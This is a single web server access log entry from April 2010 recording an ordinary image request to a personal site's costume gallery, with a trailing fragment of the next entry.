77.254.172.42 - - [09/Apr/2010:12:44:32 -0500] "GET /costume/012_JPG%20copy.jpg HTTP/1.1" 200 43366 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)" 77.254.172.42 - -